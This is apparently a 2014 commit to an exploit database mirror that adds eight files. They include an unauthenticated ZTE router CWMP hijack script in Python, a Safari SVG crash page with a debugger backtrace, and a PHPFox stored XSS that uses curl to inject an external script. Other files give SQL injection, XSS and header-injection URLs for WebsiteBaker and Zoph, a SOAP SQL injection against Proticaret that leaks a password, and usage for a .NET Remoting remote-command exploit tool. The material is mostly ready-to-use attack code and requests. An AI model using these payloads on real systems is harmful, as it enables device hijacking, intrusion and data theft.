Updated 11_19_2014

This commit is contained in:
Offensive Security 2014-11-19 04:49:39 +00:00
parent 892f0c3055
commit a28bed7356
8 changed files with 682 additions and 0 deletions

View file

@ -31767,3 +31767,10 @@ id,file,description,date,author,platform,type,port
35265,platforms/php/webapps/35265.php,"WordPress Recip.ly 1.1.7 'uploadImage.php' Arbitrary File Upload Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0
35266,platforms/php/webapps/35266.txt,"MyBB Forums 1.8.2 - Stored XSS Vulnerability",2014-11-17,"Avinash Thapa",php,webapps,0
35272,platforms/hardware/webapps/35272.txt,"ZTE ZXHN H108L - Authentication Bypass",2014-11-17,"Project Zero Labs",hardware,webapps,0
35274,platforms/php/webapps/35274.txt,"PHPFox - Stored XSS Vulnerability",2014-11-17,spyk2r,php,webapps,80
35275,platforms/xml/webapps/35275.txt,"Proticaret E-Commerce Script 3.0 - SQL Injection",2014-11-17,"BGA Security",xml,webapps,80
35276,platforms/hardware/webapps/35276.txt,"ZTE ZXHN H108L - Authentication Bypass",2014-11-17,"Project Zero Labs",hardware,webapps,80
35277,platforms/php/webapps/35277.txt,"WebsiteBaker 2.8.3 - Multiple Vulnerabilities",2014-11-17,"Manuel García Cárdenas",php,webapps,80
35278,platforms/php/webapps/35278.txt,"Zoph 0.9.1 - Multiple Vulnerabilities",2014-11-17,"Manuel García Cárdenas",php,webapps,80
35279,platforms/osx/dos/35279.html,"Safari 8.0 / OS X 10.10 - Crash PoC",2014-11-17,w3bd3vil,osx,dos,0
35280,platforms/windows/remote/35280.txt,".NET Remoting Services Remote Command Execution",2014-11-17,"James Forshaw",windows,remote,0

Can't render this file because it is too large.

View file

@ -0,0 +1,71 @@
About the software
==================
ZTE ZXHN H108L is provided by some large Greek ISPs to their subscribers.
Vulnerability Details
=====================
CWMP configuration is accessible only through the Administrator account. CWMP is a protocol widely used by ISPs worldwide for remote provisioning and troubleshooting their subscribers' equipment. However editing the CWMP configuration (more specifically sending the POST request) does not require any user authentication.
Affected Products
=================
Device model : ZTE ZXHN H108L
Firmware Version : ZXHN H108LV4.0.0d_ZRQ_GR4
Proof of Concept
================
#!/usr/bin/python
import requests
acs_server = "http://<server>:<port>"
acs_user = "user"
acs_pass = "pass"
# Connection request parameters. When a request is made to the following URL, using the specified user/pass combination,
# router will connect back to the ACS server.
conn_url = "/tr069"
conn_port = "7564"
conn_user = "user"
conn_pass = "pass"
#Periodic inform parameters
active = 1
interval = 2000
payload = {'CWMP_active': '1', 'CWMP_ACSURL': acs_server,'CWMP_ACSUserName': acs_user,'CWMP_ACSPassword': acs_pass, 'CWMP_ConnectionRequestPath': conn_url, 'CWMP_ConnectionRequestPort': conn_port, 'CWMP_ConnectionRequestUserName': conn_user, 'CWMP_ConnectionRequestPassword': conn_pass, 'CWMP_PeriodActive': active, 'CWMP_PeriodInterval': interval, 'CWMPLockFlag': '0' }
r = requests.post("http://192.168.1.254/Forms/access_cwmp_1", data=payload)
Impact
======
The described vulnerability allows any unauthenticated user to edit the CWMP configuration. Exploitation can be performed by LAN users or through the Internet if the router is configured to expose the web interface to WAN. Also because the router lacks of CSRF protection, malicious JS code can be deployed in order to exploit the vulnerability through a malicious web page.
Severity
========
Medium
References
==========
https://projectzero.gr/en/2014/11/zte-zxhn-h108l-authentication-bypass/
Disclosure Timeline
===================
27/10/2014 - First communication attempt to both vendor and ISP
04/11/2014 - ZTE response states that ISP should be contacted
03/11/2014 - Second attempt to contact the ISP.
14/11/2014 - No response from ISP. Public Disclosure
Contact Information
===================
Domain: https://projectzero.gr
Social: twitter.com/projectzerolabs
Contact: labs _at_ projectzero.gr

127
platforms/osx/dos/35279.html Executable file
View file

@ -0,0 +1,127 @@
@w3bd3vil
<!DOCTYPE html>
<head>
<style>
svg {
padding-top: 1337%;
box-sizing: border-box;
}
</style>
</head>
<body>
<svg viewBox="0 0 500 500" width="500" height="500">
<polyline points="1 1,2 2"></polyline>
</svg>
</body>
</html>
<!--
Safari 8.0 / OSX 10.10
* thread #1: tid = 0xc2e73, 0x00007fff8ab10282 libsystem_kernel.dylib`__pthread_kill + 10, queue = 'com.apple.main-thread', stop reason = signal SIGABRT
frame #0: 0x00007fff8ab10282 libsystem_kernel.dylib`__pthread_kill + 10
libsystem_kernel.dylib`__pthread_kill + 10:
-> 0x7fff8ab10282: jae 0x7fff8ab1028c ; __pthread_kill + 20
0x7fff8ab10284: movq %rax, %rdi
0x7fff8ab10287: jmp 0x7fff8ab0bca3 ; cerror_nocancel
0x7fff8ab1028c: retq
(lldb) register read
General Purpose Registers:
rax = 0x0000000000000000
rbx = 0x0000000000000006
rcx = 0x00007fff5b761d98
rdx = 0x0000000000000000
rdi = 0x000000000000140f
rsi = 0x0000000000000006
rbp = 0x00007fff5b761dc0
rsp = 0x00007fff5b761d98
r8 = 0x0000000000000000
r9 = 0x00000000000000a8
r10 = 0x0000000008000000
r11 = 0x0000000000000206
r12 = 0x00007fff84b36487 "transform_is_valid(m)"
r13 = 0x0000000108c2c000
r14 = 0x00007fff747ae300 libsystem_pthread.dylib`_thread
r15 = 0x00007fff84b36477 "Paths/CGPath.cc"
rip = 0x00007fff8ab10282 libsystem_kernel.dylib`__pthread_kill + 10
rflags = 0x0000000000000206
cs = 0x0000000000000007
fs = 0x0000000000000000
gs = 0x0000000000000000
(lldb) bt
* thread #1: tid = 0xc2e73, 0x00007fff8ab10282 libsystem_kernel.dylib`__pthread_kill + 10, queue = 'com.apple.main-thread', stop reason = signal SIGABRT
* frame #0: 0x00007fff8ab10282 libsystem_kernel.dylib`__pthread_kill + 10
frame #1: 0x00007fff904df4c3 libsystem_pthread.dylib`pthread_kill + 90
frame #2: 0x00007fff88d36b73 libsystem_c.dylib`abort + 129
frame #3: 0x00007fff88cfec59 libsystem_c.dylib`__assert_rtn + 321
frame #4: 0x00007fff84643cb6 CoreGraphics`CGPathCreateMutableCopyByTransformingPath + 242
frame #5: 0x00007fff84692a2f CoreGraphics`CGContextAddPath + 93
frame #6: 0x00007fff8e9b5f04 WebCore`WebCore::GraphicsContext::fillPath(WebCore::Path const&) + 148
frame #7: 0x00007fff8f479ad1 WebCore`WebCore::RenderSVGResourceSolidColor::postApplyResource(WebCore::RenderElement&, WebCore::GraphicsContext*&, unsigned short, WebCore::Path const*, WebCore::RenderSVGShape const*) + 65
frame #8: 0x00007fff8f47a2fa WebCore`WebCore::RenderSVGShape::fillShape(WebCore::RenderStyle const&, WebCore::GraphicsContext*) + 122
frame #9: 0x00007fff8f47a633 WebCore`WebCore::RenderSVGShape::fillStrokeMarkers(WebCore::PaintInfo&) + 131
frame #10: 0x00007fff8eab4aeb WebCore`WebCore::RenderSVGShape::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 379
frame #11: 0x00007fff8eab477d WebCore`WebCore::RenderSVGRoot::paintReplaced(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 1325
frame #12: 0x00007fff8ea2c3f2 WebCore`WebCore::RenderReplaced::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 722
frame #13: 0x00007fff8ef300a8 WebCore`WebCore::InlineElementBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 312
frame #14: 0x00007fff8e9b1e83 WebCore`WebCore::InlineFlowBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 1251
frame #15: 0x00007fff8e9b1929 WebCore`WebCore::RootInlineBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 89
frame #16: 0x00007fff8e9613c6 WebCore`WebCore::RenderLineBoxList::paint(WebCore::RenderBoxModelObject*, WebCore::PaintInfo&, WebCore::LayoutPoint const&) const + 694
frame #17: 0x00007fff8e95e9a3 WebCore`WebCore::RenderBlock::paintContents(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 67
frame #18: 0x00007fff8e95dd54 WebCore`WebCore::RenderBlock::paintObject(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 420
frame #19: 0x00007fff8e95ffdf WebCore`WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 287
frame #20: 0x00007fff8f3d74c9 WebCore`WebCore::RenderBlock::paintChild(WebCore::RenderBox&, WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 393
frame #21: 0x00007fff8e95eaa8 WebCore`WebCore::RenderBlock::paintChildren(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 72
frame #22: 0x00007fff8e95ea50 WebCore`WebCore::RenderBlock::paintContents(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 240
frame #23: 0x00007fff8e95dd54 WebCore`WebCore::RenderBlock::paintObject(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 420
frame #24: 0x00007fff8e95ffdf WebCore`WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 287
frame #25: 0x00007fff8f3d74c9 WebCore`WebCore::RenderBlock::paintChild(WebCore::RenderBox&, WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 393
frame #26: 0x00007fff8e95eaa8 WebCore`WebCore::RenderBlock::paintChildren(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 72
frame #27: 0x00007fff8e95ea50 WebCore`WebCore::RenderBlock::paintContents(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 240
frame #28: 0x00007fff8e95dd54 WebCore`WebCore::RenderBlock::paintObject(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 420
frame #29: 0x00007fff8e95ffdf WebCore`WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 287
frame #30: 0x00007fff8f3d74c9 WebCore`WebCore::RenderBlock::paintChild(WebCore::RenderBox&, WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 393
frame #31: 0x00007fff8e95eaa8 WebCore`WebCore::RenderBlock::paintChildren(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 72
frame #32: 0x00007fff8e95ea50 WebCore`WebCore::RenderBlock::paintContents(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 240
frame #33: 0x00007fff8e95dd54 WebCore`WebCore::RenderBlock::paintObject(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 420
frame #34: 0x00007fff8e95ffdf WebCore`WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 287
frame #35: 0x00007fff8e95e8e2 WebCore`WebCore::RenderLayer::paintForegroundForFragmentsWithPhase(WebCore::PaintPhase, WTF::Vector<WebCore::LayerFragment, 1ul, WTF::CrashOnOverflow> const&, WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int, WebCore::RenderObject*) + 370
frame #36: 0x00007fff8e95e5b7 WebCore`WebCore::RenderLayer::paintForegroundForFragments(WTF::Vector<WebCore::LayerFragment, 1ul, WTF::CrashOnOverflow> const&, WebCore::GraphicsContext*, WebCore::GraphicsContext*, WebCore::LayoutRect const&, bool, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int, WebCore::RenderObject*, bool, bool) + 423
frame #37: 0x00007fff8e95d252 WebCore`WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 2386
frame #38: 0x00007fff8e95c6e2 WebCore`WebCore::RenderLayer::paintLayer(WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 1010
frame #39: 0x00007fff8e95d392 WebCore`WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 2706
frame #40: 0x00007fff8e988376 WebCore`WebCore::RenderLayerBacking::paintIntoLayer(WebCore::GraphicsLayer const*, WebCore::GraphicsContext*, WebCore::IntRect const&, unsigned int, unsigned int) + 358
frame #41: 0x00007fff8f432baf WebCore`WebCore::RenderLayerBacking::paintContents(WebCore::GraphicsLayer const*, WebCore::GraphicsContext&, unsigned int, WebCore::FloatRect const&) + 799
frame #42: 0x00007fff8ee86924 WebCore`WebCore::GraphicsLayer::paintGraphicsLayerContents(WebCore::GraphicsContext&, WebCore::FloatRect const&) + 132
frame #43: 0x00007fff8f3b2f59 WebCore`WebCore::PlatformCALayer::drawLayerContents(CGContext*, WebCore::PlatformCALayer*, WTF::Vector<WebCore::FloatRect, 5ul, WTF::CrashOnOverflow>&) + 361
frame #44: 0x00007fff8f60f367 WebCore`WebCore::TileGrid::platformCALayerPaintContents(WebCore::PlatformCALayer*, WebCore::GraphicsContext&, WebCore::FloatRect const&) + 167
frame #45: 0x00007fff8f6983fc WebCore`-[WebSimpleLayer drawInContext:] + 172
frame #46: 0x00007fff85249355 QuartzCore`CABackingStoreUpdate_ + 3820
frame #47: 0x00007fff85248463 QuartzCore`___ZN2CA5Layer8display_Ev_block_invoke + 59
frame #48: 0x00007fff8524841f QuartzCore`x_blame_allocations + 81
frame #49: 0x00007fff85247f1c QuartzCore`CA::Layer::display_() + 1546
frame #50: 0x00007fff8f69831b WebCore`-[WebSimpleLayer display] + 43
frame #51: 0x00007fff85247641 QuartzCore`CA::Layer::display_if_needed(CA::Transaction*) + 603
frame #52: 0x00007fff85246d7d QuartzCore`CA::Layer::layout_and_display_if_needed(CA::Transaction*) + 35
frame #53: 0x00007fff8524650e QuartzCore`CA::Context::commit_transaction(CA::Transaction*) + 242
frame #54: 0x00007fff85246164 QuartzCore`CA::Transaction::commit() + 390
frame #55: 0x00007fff85256f55 QuartzCore`CA::Transaction::observer_callback(__CFRunLoopObserver*, unsigned long, void*) + 71
frame #56: 0x00007fff867e5d87 CoreFoundation`__CFRUNLOOP_IS_CALLING_OUT_TO_AN_OBSERVER_CALLBACK_FUNCTION__ + 23
frame #57: 0x00007fff867e5ce0 CoreFoundation`__CFRunLoopDoObservers + 368
frame #58: 0x00007fff867d7858 CoreFoundation`CFRunLoopRunSpecific + 328
frame #59: 0x00007fff8434943f HIToolbox`RunCurrentEventLoopInMode + 235
frame #60: 0x00007fff843491ba HIToolbox`ReceiveNextEventCommon + 431
frame #61: 0x00007fff84348ffb HIToolbox`_BlockUntilNextEventMatchingListInModeWithFilter + 71
frame #62: 0x00007fff90583821 AppKit`_DPSNextEvent + 964
frame #63: 0x00007fff90582fd0 AppKit`-[NSApplication nextEventMatchingMask:untilDate:inMode:dequeue:] + 194
frame #64: 0x00007fff90576f73 AppKit`-[NSApplication run] + 594
frame #65: 0x00007fff90562424 AppKit`NSApplicationMain + 1832
frame #66: 0x00007fff8d881ef2 libxpc.dylib`_xpc_objc_main + 793
frame #67: 0x00007fff8d883a9d libxpc.dylib`xpc_main + 490
frame #68: 0x000000010449ab40 com.apple.WebKit.WebContent`___lldb_unnamed_function1$$com.apple.WebKit.WebContent + 16
frame #69: 0x00007fff850755c9 libdyld.dylib`start + 1
frame #70: 0x00007fff850755c9 libdyld.dylib`start + 1
(lldb)
-->

80
platforms/php/webapps/35274.txt Executable file
View file

@ -0,0 +1,80 @@
# Exploit Title: PHPFox XSS AdminCP
# Date: 2014-10-22
# Exploit Author: Wesley Henrique Leite aka "spyk2r"
# Vendor Homepage: http://www.moxi9.com
# Version: All version
# CVE : CVE-2014-8469
# Response Vendor: fixed 2014-10-23 (to v4 Beta)
[+] DESCRIPTION
The system stores all urls accessed in a database table, below
information in the same 'phpfox_log_session'
[phpfox]> desc phpfox_log_session;
+---------------+----------------------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+---------------+----------------------+------+-----+---------+-------+
++++++++++ more values and
| user_agent | varchar(100) | NO | | NULL | |
+---------------+----------------------+------+-----+---------+-------+
the column that can be manipulated is:
-> user_agent (100)
all acess store in the system, such as bots and users wandering around the
web site, can be seen in:
AdminCP
TOOLS > Online > Guests/Boots
Output
| IP ADDRESS | User-Agent | ...
knowing this, the following code was created to inject a script into the
AdminCP with User-Agent.
$ curl -A "<script src='http://www.example.com/script.js'></script>" \
http://www.meusite.com.br/
OR
$ curl -A "<script>alert(1);</script>" http://www.meusite.com.br/
when any user with administrative access in.
'AdminCP'
TOOLS > Online > Guests/Boots
we have the script running in the administrative area.
[+] My Solution
(line 1.8)
1.1 --- a/module/core/template/default/controller/admincp/online-guest.html.php
Tue Oct 21 10:00:11 2014 -0200
1.2 +++ b/module/core/template/default/controller/admincp/online-guest.html.php
Tue Oct 21 12:28:39 2014 -0200
1.3 @@ -25,7 +25,7 @@
1.4 {foreach from=$aGuests key=iKey item=aGuest}
1.5 <tr class="checkRow{if is_int($iKey/2)} tr{else}{/if}">
1.6 <td><a href="{url link='admincp.core.ip'
search=$aGuest.ip_address_search}" title="{phrase
var='admincp.view_all_the_activity_from_this_ip'}">{$aGuest.ip_address}</a></td>
1.7 - <td>{$aGuest.user_agent}</td>
1.8 + <td>{$aGuest.user_agent|strip_tags}</td>
1.9 <td class="t_center">
1.10 <div class="js_item_is_active"{if !$aGuest.ban_id}
style="display:none;"{/if}>
1.11 <a href="#?call=ban.ip&ip={$aGuest.ip_address}&active=0"
class="js_item_active_link" title="{phrase var='admincp.unban'}">{img
theme='misc/bullet_green.png' alt=''}</a>
1.12 @@ -43,4 +43,4 @@
1.13 <div class="extra_info">
1.14 {phrase var='admincp.no_guests_online'}
1.15 </div>
1.16 -{/if}
1.17 \ No newline at end of file
1.18 +{/if}

111
platforms/php/webapps/35277.txt Executable file
View file

@ -0,0 +1,111 @@
=============================================
MGC ALERT 2014-004
- Original release date: March 11, 2014
- Last revised: November 18, 2014
- Discovered by: Manuel Garcia Cardenas
- Severity: 10/10 (CVSS Base Score)
=============================================
I. VULNERABILITY
-------------------------
Multiple Vulnerabilities in WebsiteBaker 2.8.3
II. BACKGROUND
-------------------------
WebsiteBaker helps you to create the website you want: A free, easy and
secure, flexible and extensible open source content management system (CMS).
III. DESCRIPTION
-------------------------
It is possible to inject SQL code in the variable "id" on the page
"modify.php". This bug was found using the portal without authentication.
To exploit the vulnerability only is needed use the version 1.0 of the HTTP
protocol to interact with the application.
Has been detected a reflected XSS vulnerability in WebsiteBaker, that
allows the execution of arbitrary HTML/script code to be executed in the
context of the victim user's browser.
An input validation problem exists within WebsiteBaker which allows
injecting CR (carriage return - %0D or \r) and LF (line feed - %0A or \n)
characters into the server HTTP response header, resulting in a HTTP
Response Splitting Vulnerability.
IV. PROOF OF CONCEPT
-------------------------
SQL Injection:
/wb/admin/pages/modify.php?page_id=1
Cross-Site Scripting GET:
/wb/admin/admintools/tool.php?tool=captcha_control&6d442"><script>alert(1)</script>8e3b12642a8=1
/wb/modules/edit_module_files.php?page_id=1&mod_dir=news&edit_file=frontend.css&action=edit&page_id=1&section_id=%007e393<script>alert(1)</script>9f8a40a7355f9acf0
/wb/modules/news/add_post.php?page_id=1&section_id=f953a"><script>alert(1)</script>4ddf3369c1f
/wb/modules/news/modify_group.php?page_id=1&section_id=%008cf03"><script>alert(1)</script>2680504c3ec&group_id=62be99873b33d1d3
/wb/modules/news/modify_post.php?page_id=1&section_id=%003874a<script>alert(1)</script>4194d511605&post_id=db89943875a2db52
/wb/modules/news/modify_settings.php?page_id=1&section_id=%008b2f4"><script>alert(1)</script>bdc8b3919b5
HTTP RESPONSE SPLITTING:
If you enter a valid user and password, you can inject on the headers
malicious code, example.
POST /wb/admin/login/index.php HTTP/1.1
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.244.129:80/wb/
Host: 127.0.0.1
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
password_fieldname=password_nwh1uuwb&password_nwh1uuwb=VALIDPASS&remember=true&submit=Entrar&
url=%0d%0a%20InjectedHeader:MaliciousCode&username_fieldname=username_nwh1uuwb&username_nwh1uuwb=adminResponse
You can inject a new header named: InjectedHeader:MaliciousCode because we
inject a CR&LF new line with %0d%0a%20.
V. BUSINESS IMPACT
-------------------------
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.
VI. SYSTEMS AFFECTED
-------------------------
WebsiteBaker <= 2.8.3
VII. SOLUTION
-------------------------
No news releases
VIII. REFERENCES
-------------------------
http://www.websitebaker.org
IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).
X. REVISION HISTORY
-------------------------
March 11, 2014 1: Initial release
XI. DISCLOSURE TIMELINE
-------------------------
March 11, 2014 1: Vulnerability acquired by Manuel Garcia Cardenas
March 11, 2014 2: Send to vendor
June 05, 2014 3: Second mail to the verdor without response
November 18, 2014 4: Sent to lists
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
XIII. ABOUT
-------------------------
Manuel Garcia Cardenas
Pentester

84
platforms/php/webapps/35278.txt Executable file
View file

@ -0,0 +1,84 @@
=============================================
MGC ALERT 2014-005
- Original release date: March 5, 2014
- Last revised: November 18, 2014
- Discovered by: Manuel Garcia Cardenas
- Severity: 10/10 (CVSS Base Score)
=============================================
I. VULNERABILITY
-------------------------
Multiple Vulnerabilities in Zoph <= 0.9.1
II. BACKGROUND
-------------------------
Zoph (Zoph Organizes Photos) is a web based digital image presentation and
management system. In other words, a photo album. It is built with PHP,
MySQL and Perl.
III. DESCRIPTION
-------------------------
It is possible to inject SQL code in the variables "id" and "action" on the
pages group, photos and user. This bug was found using the portal with
authentication. To exploit the vulnerability only is needed use the version
1.0 of the HTTP protocol to interact with the application.
Has been detected a reflected XSS vulnerability in Zoph, that allows the
execution of arbitrary HTML/script code to be executed in the context of
the victim user's browser.
IV. PROOF OF CONCEPT
-------------------------
SQL Injection:
/zoph/php/group.php?_action=1'%22&_clear_crumbs=1
/zoph/php/photos.php?location_id=1'%22
/zoph/php/user.php?user_id=&_action=1'%22
Cross-Site Scripting GET:
/zoph/php/edit_photos.php?photographer_id=3"><script>alert(1)</script>
/zoph/php/edit_photos.php?album_id=2&_crumb=3"><script>alert(1)</script>
V. BUSINESS IMPACT
-------------------------
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.
VI. SYSTEMS AFFECTED
-------------------------
Zoph <= 0.9.1
VII. SOLUTION
-------------------------
No news releases
VIII. REFERENCES
-------------------------
http://www.zoph.org/
IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).
X. REVISION HISTORY
-------------------------
March 11, 2014 1: Initial release
XI. DISCLOSURE TIMELINE
-------------------------
March 5, 2014 1: Vulnerability acquired by Manuel Garcia Cardenas
March 5, 2014 2: Send to vendor
June 17, 2014 3: Second mail to the verdor without response
November 18, 2014 4: Sent to lists
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
XIII. ABOUT
-------------------------
Manuel Garcia Cardenas
Pentester

View file

@ -0,0 +1,78 @@
Source: https://github.com/tyranid/ExploitRemotingService
Exploit Database Mirror: http://www.exploit-db.com/sploits/35280.zip
ExploitRemotingService (c) 2014 James Forshaw
=============================================
A tool to exploit .NET Remoting Services vulnerable to CVE-2014-1806 or CVE-2014-4149.
It only works on Windows although some aspects _might_ work in Mono on *nix.
Usage Instructions:
===================
ExploitRemotingService [options] uri command [command args]
Copyright (c) James Forshaw 2014
Uri:
The supported URI are as follows:
tcp://host:port/ObjName - TCP connection on host and portname
ipc://channel/ObjName - Named pipe channel
Options:
-s, --secure Enable secure mode
-p, --port=VALUE Specify the local TCP port to listen on
-i, --ipc=VALUE Specify listening pipe name for IPC channel
--user=VALUE Specify username for secure mode
--pass=VALUE Specify password for secure mode
--ver=VALUE Specify version number for remote, 2 or 4
--usecom Use DCOM backchannel instead of .NET remoting
--remname=VALUE Specify the remote object name to register
-v, --verbose Enable verbose debug output
--useser Uses old serialization tricks, only works on
full type filter services
-h, -?, --help
Commands:
exec [-wait] program [cmdline]: Execute a process on the hosting server
cmd cmdline : Execute a command line process and display stdou
t
put localfile remotefile : Upload a file to the hosting server
get remotefile localfile : Download a file from the hosting server
ls remotedir : List a remote directory
run file [args] : Upload and execute an assembly, calls entry point
user : Print the current username
ver : Print the OS version
This tool supports exploit both TCP remoting services and local IPC services. To test
the exploit you need to know the name of the .NET remoting service and the port it's
listening on (for TCP) or the name of the Named Pipe (for IPC). You can normally find
this in the server or client code. Look for things like calls to:
RemotingConfiguration.RegisterWellKnownServiceType or Activator.CreateInstance
You can then try the exploit by constructing an appropriate URL. If TCP you can use the
URL format tcp://hostname:port/ServiceName. For IPC use ipc://NamedPipeName/ServiceName.
A simple test is to do:
ExploitRemotingService SERVICEURL ver
If successful it should print the OS version of the hosting .NET remoting service. If
you get an exception it might be fixed with CVE-2014-1806. At this point try the COM
version using:
ExploitRemotingService -usecom SERVICEURL ver
This works best locally but can work remotely if you modify the COM configuration and
disable the firewall you should be able to get it to work. If that still doesn't work
then it might be an up to date server. Instead you can also try the full serialization
version using.
ExploitRemotingService -useser SERVICEURL ls c:\
For this to work the remoting service must be running with full typefilter mode enabled
(which is some, especially IPC services). It also only works with the commands ls, put
and get. But that should be enough to compromise a box.
I've provided an example service to test against.

124
platforms/xml/webapps/35275.txt Executable file
View file

@ -0,0 +1,124 @@
Document Title:
============
Proticaret E-Commerce Script v3.0 >= SQL Injection
Release Date:
===========
13 Nov 2014
Product & Service Introduction:
========================
Proticaret is a free e-commerce script.
Abstract Advisory Information:
=======================
BGA Security Team discovered an SQL injection vulnerability in Proticaret E-Commerce Script v3.0
Vulnerability Disclosure Timeline:
=========================
20 Oct 2014 : Contact with Vendor
20 Nov 2014 : Vendor Response
June 26, 2014 : Patch Released
13 Nov 2014 : Public Disclosure
Discovery Status:
=============
Published
Affected Product(s):
===============
Promist Bilgi ?leti?im Teknolojileri A.?
Product: Proticaret E-commerce Script v3.0 >=
Exploitation Technique:
==================
Remote, Unauthenticated
Severity Level:
===========
Critical
Technical Details & Description:
========================
SQL Injection
Proof of Concept (PoC):
==================
Proof of Concept
Request:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
<soapenv:Header/>
<soapenv:Body>
<tem:GetProductCodes>
<!--Optional:-->
<tem:Code>1' from Users where (select top 1 password from users where userId=101)>1- -</tem:Code>
<!--Optional:-->
<tem:StartWith>?</tem:StartWith>
</tem:GetProductCodes>
</soapenv:Body>
</soapenv:Envelope>
Response:
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body>
<soap:Fault>
<faultcode>soap:Server</faultcode>
<faultstring>System.Web.Services.Protocols.SoapException: Server
was unable to process request. --->
System.Data.SqlClient.SqlException: Conversion failed when converting
the nvarchar value 'secretpassword' to data type int.
at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
at System.Data.SqlClient.SqlInternalConnection.OnError(SqlException
exception, Boolean breakConnection, Action`1 wrapCloseInAction)
at
System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject
stateObj, Boolean callerHasConnectionLock, Boolean asyncClose)
at
System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior,
SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet
bulkCopyHandler, TdsParserStateObject stateObj, Boolean&
dataReady)
at System.Data.SqlClient.SqlDataReader.TryHasMoreRows(Boolean& moreRows)
at System.Data.SqlClient.SqlDataReader.TryReadInternal(Boolean setTimeout, Boolean& more)
at System.Data.SqlClient.SqlDataReader.Read()
at ASPNetPortal.ProductService.GetProductCodes(String Code, String StartWith)
--- End of inner exception stack trace ---</faultstring>
<detail/>
</soap:Fault>
</soap:Body>
</soap:Envelope>
Solution Fix & Patch:
================
Apply the patch for v3.0
Security Risk:
==========
The risk of the vulnerabilities above estimated as critical.
Credits & Authors:
==============
Bilgi Güvenli?i Akademisi
Disclaimer & Information:
===================
The
information provided in this advisory is provided as it is without any
warranty. BGA disclaims all warranties, either expressed or implied,
including the warranties of merchantability and capability for a
particular purpose. BGA or its suppliers are not liable in any case of
damage, including direct, indirect, incidental, consequential loss of
business profits or special damages.
Domain: www.bga.com.tr
Social: twitter.com/bgasecurity
Contact: bilgi@bga.com.tr
Copyright © 2014 | BGA